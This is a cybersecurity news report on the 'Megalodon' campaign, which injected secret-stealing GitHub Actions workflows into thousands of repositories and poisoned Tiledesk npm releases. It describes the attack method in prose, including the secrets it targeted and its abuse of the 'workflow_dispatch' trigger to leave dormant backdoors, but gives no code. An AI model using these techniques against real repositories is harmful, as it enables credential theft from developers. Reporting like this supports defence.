Megalodon Supply Chain Attack Compromises Over 5,500 GitHub Repositories in Just Six Hours
A significant software supply chain attack, referred to as “Megalodon,” has compromised over 5,500 repositories on GitHub, raising alarms about the increasing exploitation of automated development pipelines and GitHub Actions workflows. This incident, uncovered by SafeDep, involved a rapid deployment of malicious commits that injected credential-stealing payloads into numerous repositories.
Attack Overview and Methodology
The Megalodon campaign targeted repositories through automated commits that introduced malicious GitHub Actions workflows. These workflows were designed to harvest sensitive credentials, cloud access keys, API tokens, and other secrets stored within continuous integration and continuous delivery (CI/CD) environments.
On May 18, 2026, attackers executed a coordinated assault, pushing more than 5,700 malicious commits across thousands of repositories within a mere six-hour window. SafeDep’s investigation revealed that a total of 5,718 commits were deployed between approximately 11:36 UTC and 17:48 UTC, impacting 5,561 distinct GitHub repositories.
Researchers indicated that the Megalodon operation heavily relied on GitHub Actions to maintain persistence and covertly collect sensitive information from compromised development environments. The attackers utilized two distinct payloads: one introduced a new GitHub Actions workflow set to run on every push and pull request, while the second replaced existing workflows linked to specific triggers, effectively creating dormant backdoors that could be activated remotely.
Scale and Coordination of the Attack
The malicious commits associated with this attack were reportedly authored by a user identified as “build-bot.” During the investigation, researchers uncovered 2,878 commits made on the same day linked to this email address, along with another 2,841 commits tied to a second email address associated with the operation. All 5,718 commits tied to the Megalodon campaign were executed within the same six-hour timeframe, underscoring the highly coordinated and automated nature of the attack.
The scale and speed of this operation highlight the growing trend of threat actors weaponizing GitHub Actions and software development workflows to distribute malicious code at an unprecedented scale.
Targeted Data and Exfiltration Techniques
On the compromised systems, the malware aimed to exfiltrate a wide range of sensitive data. According to researchers, the stolen information encompassed CI environment variables, AWS credentials, Google Cloud Platform access tokens, Azure credentials, SSH private keys, Docker and Kubernetes configuration files, database connection strings, GitHub Actions tokens, GitLab CI/CD tokens, API keys, and numerous other secrets typically stored in development pipelines.
A significant concern raised by researchers was the attackers’ use of the “workflow_dispatch” feature within GitHub Actions. This malicious workflow leveraged the trigger mechanism to establish dormant backdoors that could later be activated through the GitHub API using stolen GitHub tokens.
Researchers noted that the “workflow_dispatch” mechanism is exempt from GitHub’s anti-recursion protections, which usually prevent workflows from spawning additional runs through GitHub token-triggered events. This loophole potentially allowed attackers to reactivate compromised workflows even after the initial breach.
Links to Compromised Open-Source Packages
The researchers identified the Megalodon campaign after discovering malicious versions of the Tiledesk package, an open-source live chat and chatbot platform. The infected packages were reportedly published between May 19 and May 21, shortly after the malicious commits were introduced into the source repositories.
SafeDep’s analysis indicated that the same NPM account, “eljohnny,” using the email address [email protected], had published both the legitimate version 2.18.5 and the compromised versions of the package. It was emphasized that the attacker did not directly compromise the NPM account itself.
The attacker never accessed the NPM account; instead, they compromised the GitHub repository, leading the maintainer to publish from the poisoned source without realizing it.
Implications for Cybersecurity Practices
The Megalodon incident emerged shortly after NPM announced new security measures aimed at limiting similar supply chain attacks. Recently, NPM invalidated all granular access tokens with write permissions that bypassed two-factor authentication protections. This move was intended to mitigate the risk of attacks resembling earlier campaigns.
However, cybersecurity researchers cautioned that token protection alone may not adequately address the broader issue of repository compromise and the propagation of malicious code. Ox Security stated that while stricter token controls might reduce account hijacking risks, they do not resolve the fundamental problem of compromised repositories distributing malicious code within trusted development ecosystems.
If platforms continue to allow any type of code to be uploaded without rigorous vetting, the frequency of attacks is likely to increase. The company also warned that the Megalodon campaign could signify the onset of a larger wave of attacks targeting developers and open-source ecosystems globally.
“We’ve entered a new supply chain attack era, and TeamPCP compromising GitHub was only the beginning. What’s coming next is an endless wave, a tsunami of cyber attacks on developers worldwide,” Ox Security stated.
For further details on this incident, visit the original reporting source: thecyberexpress.com.
Keep reading for the latest cybersecurity developments, threat intelligence and breaking updates from across the Middle East.
